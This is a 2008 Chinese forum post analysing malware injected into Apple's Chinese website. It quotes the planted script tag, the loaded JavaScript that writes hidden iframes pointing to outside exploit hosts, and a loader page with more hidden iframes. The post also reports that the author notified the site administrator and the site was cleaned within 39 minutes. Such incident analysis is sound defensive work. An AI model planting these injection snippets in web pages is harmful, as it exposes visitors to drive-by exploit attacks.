
难道是让大家都用mac os么?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
看看今天的主角~
http://www.apple.com.cn
出问题的脚本位于head部分- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
- "http://www.w3.org/TR/html4/loose.dtd">
- <script src=http://1.hao929.cn/999.js></script>
- <!---equiv="content-type" content="text/html;
- charset=gb2312">
复制代码 被加载的js的关键语句是:- document.writeln("<\/SCRIPT>");
- document.writeln("<iframe src=http:\/\/c.j8j8.biz\/107\/ width=50 height=0><\/iframe> ");
- document.writeln("<iframe src=http:\/\/1.hao929.cn\/999.htm width=50 height=0><\/iframe> ");
复制代码 顺便找出其他的东西- http://c.j8j8.biz/107/
- http://1.hao929.cn/999.htm
复制代码 继续分析的内容为- <html><TITLE>index</TITLE><BODY>
- <iframe src="" width=100 height=1></iframe>
- <iframe src="r.htm" width=100 height=1></iframe>
- <iframe src="1.htm" width=100 height=1></iframe>
- </body></html>
- <script src='http://s109.cnzz.com/stat.php?id=418410&web_id=418410' language='JavaScript' charset='gb2312'></script>
复制代码 很恶俗的出现了
1.htm
r.htm
这两个东西太长了,打包在附件里,是两个漏洞利用脚本。
刚才的- http://1.hao929.cn/999.htm
复制代码 也一样是漏洞利用脚本
继续分析下去就交给大家了。
这年头apple都不安全了~~
已经通知了管理员,估计不久就可以修复了(发出的邮件快照)
39分钟后,网站被修复了~~~速度不错~比以前的太平洋不知道快了多少倍。现在已经正常了。
[ 本帖最后由 ALEXBLAIR 于 2008-3-14 01:42 编辑 ] |